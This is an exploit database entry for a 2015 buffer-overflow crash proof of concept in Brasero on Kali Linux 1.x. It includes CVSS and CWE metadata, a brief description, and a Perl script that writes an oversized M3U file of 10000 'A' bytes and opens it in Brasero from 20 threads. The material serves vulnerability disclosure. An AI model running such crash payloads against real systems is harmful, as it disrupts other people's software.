Kali (brasero) - Crash Proof Of Concept

vendor:

Kali Linux

by:

Mohammad Reza Espargham

7.5

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Kali Linux

Affected Version From: Kali 1.x

Affected Version To: Kali 1.x

Patch Exists: YES

Related CWE: N/A

CPE: a:kali:kali_linux

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux

2015

Kali (brasero) – Crash Proof Of Concept

This proof of concept exploits a buffer overflow vulnerability in the Kali Linux Brasero application. The vulnerability is triggered when a specially crafted M3U file is opened in the application, causing it to crash. The PoC code creates a file with 10000 A characters and then opens it in the Brasero application using 20 threads.

Mitigation:

Update to the latest version of the application.

Source

Exploit-DB raw data:

#!/usr/bin/perl -w
# Title : Kali (brasero) - Crash Proof Of Concept
# website : https://www.kali.org/downloads/
# Tested : kali 1.x
#
#
# Author      :   Mohammad Reza Espargham
# Linkedin    :   https://ir.linkedin.com/in/rezasp
# E-Mail      :   me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
# Website     :   www.reza.es
# Twitter     :   https://twitter.com/rezesp
# FaceBook    :   https://www.facebook.com/mohammadreza.espargham
#
#

#Demo : http://youtu.be/XMu5ZXupbOI

system(($^O eq 'MSWin32') ? 'cls' : 'clear');


$path="/tmp/r3z4.m3u";
my $PoC = "\x41" x 10000 ;
open(crash , ">", $path);
print crash $PoC;
close(crash);


use threads;


sub check_app {   #thread sub
    system("brasero $path");
    return 0;
}

my @threads;
for (my $i = 0; $i < 20; $i++) {
    my $thread = threads->create(\&check_app);
    push(@threads, $thread);
}
foreach (@threads) { #join
    $_->join();
}